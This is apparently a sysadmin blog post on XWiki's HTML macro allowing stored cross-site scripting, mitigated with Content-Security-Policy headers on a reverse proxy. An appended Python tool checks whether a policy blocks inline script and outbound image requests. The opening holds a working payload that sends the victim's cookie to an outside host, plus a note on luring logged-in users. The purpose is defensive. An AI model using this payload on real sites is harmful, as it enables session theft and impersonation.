xwiki – by default – allows contributors to embed arbitrary html, including javascript. it does not take much effort to include something like:
{{html}} <script> document.write("<img src='https://kudzia.eu/?"+document.cookie+"&"+ (new Date().getTime())+"' />"); </script> {{/html}}
then you just need to lure your victim into visiting that wiki page while logged in – you'll get an http request containing that person's cookie, which can be re-used to impersonate her or him.
it seems that disabling the html macro is not a good idea. Content Security Policy is the best band-aid that i've found. i've modified the definition of the reverse proxy i'm using in front of xwiki to include:
Header set Content-Security-Policy "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "
Header set X-Content-Security-Policy "sandbox default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "
Header set X-Webkit-CSP "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "
and i feel somewhat better about myself – i can still use iframes showing content from some.server.with.trusted.content, injected javascript still runs (because of 'unsafe-inline') but it fails to communicate with non-trusted hosts. it can probably still be exploited, but that's better than nothing.
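to make the "injected script runs, but cannot talk to untrusted hosts" behaviour concrete, here is a small, added python evaluator (not part of the original post and not xwiki code) that parses a CSP header and answers two questions a defender cares about: does inline script execute, and would an image fetch to a given host be allowed. it uses the default-src policy from the post as-is, plus a stricter variant, a wiki origin and a collector url that are constructed for the example. host matching is simplified (scheme, port, path and nonce/hash handling are ignored), so it is a reasoning aid, not a replacement for the browser.

```python
"""Tiny CSP evaluator: does a policy let an injected <img> reach an untrusted host?"""
from urllib.parse import urlparse

# Policy copied from the Content-Security-Policy header in the post above.
WIKI_POLICY = "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content"

# Stricter variant (an assumption, not from the post): inline script no longer runs,
# and images may only be loaded from the wiki itself; iframes keep the trusted host.
STRICT_POLICY = "default-src 'self' some.server.with.trusted.content; script-src 'self'; img-src 'self'"

# Constructed sample values: the wiki's own origin and the collector host an injected <img> points at.
WIKI_ORIGIN = "https://wiki.example"
EXFIL_URL = "https://collector.invalid/?JSESSIONID=deadbeef&1700000000000"
TRUSTED_URL = "https://some.server.with.trusted.content/page"

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_csp(header: str) -> dict:
    """Split 'dir a b; dir2 c' into {'dir': ['a', 'b'], 'dir2': ['c']}; names are lower-cased."""
    directives = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def sources_for(policy: dict, directive: str):
    """Fetch directives fall back to default-src when absent; None means unrestricted."""
    if directive in policy:
        return policy[directive]
    return policy.get("default-src")


def _host_source_matches(source: str, url) -> bool:
    """Simplified CSP host-source matching: optional scheme, host with optional '*.' prefix.
    Scheme, port and path comparison are ignored, as are IP literals."""
    host_part = source.split("://", 1)[1] if "://" in source else source
    host_part = host_part.split("/", 1)[0].split(":", 1)[0].lower()
    target = (url.hostname or "").lower()
    if host_part.startswith("*."):
        return target.endswith(host_part[1:])   # '*.a.b' matches 'x.a.b' but not 'a.b'
    return target == host_part


def allows_fetch(header: str, directive: str, url: str, page_origin: str) -> bool:
    """Would a fetch governed by `directive` (img-src, frame-src, connect-src, ...) be permitted?"""
    sources = sources_for(parse_csp(header), directive)
    if sources is None:
        return True                      # neither the directive nor default-src: browser allows
    if sources == ["'none'"]:
        return False
    target = urlparse(url)
    page = urlparse(page_origin)
    for src in sources:
        if src == "*":
            return True
        if src == "'self'":
            same_origin = (target.scheme == page.scheme
                           and (target.hostname or "") == (page.hostname or "")
                           and (target.port or DEFAULT_PORTS.get(target.scheme))
                               == (page.port or DEFAULT_PORTS.get(page.scheme)))
            if same_origin:
                return True
        elif src.startswith("'"):
            continue                     # keywords such as 'unsafe-inline' never match a URL
        elif _host_source_matches(src, target):
            return True
    return False


def inline_script_allowed(header: str) -> bool:
    """Inline <script> (what the {{html}} macro injects) runs only if script-src, or default-src
    as its fallback, carries 'unsafe-inline'. Nonces and hashes are not modelled here."""
    sources = sources_for(parse_csp(header), "script-src")
    return sources is None or "'unsafe-inline'" in sources


if __name__ == "__main__":
    for name, policy in (("wiki policy", WIKI_POLICY), ("strict policy", STRICT_POLICY)):
        print(f"{name}: inline script runs={inline_script_allowed(policy)}, "
              f"img to collector allowed={allows_fetch(policy, 'img-src', EXFIL_URL, WIKI_ORIGIN)}, "
              f"iframe from trusted host allowed={allows_fetch(policy, 'frame-src', TRUSTED_URL, WIKI_ORIGIN)}")
```

with the post's policy the script runs but the image request to the collector host is refused, which is exactly the trade-off described above; the stricter variant also stops the inline script, at the cost of breaking every legitimate use of inline javascript on the wiki.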
unfortunately this change makes LiveTables unusable under IE.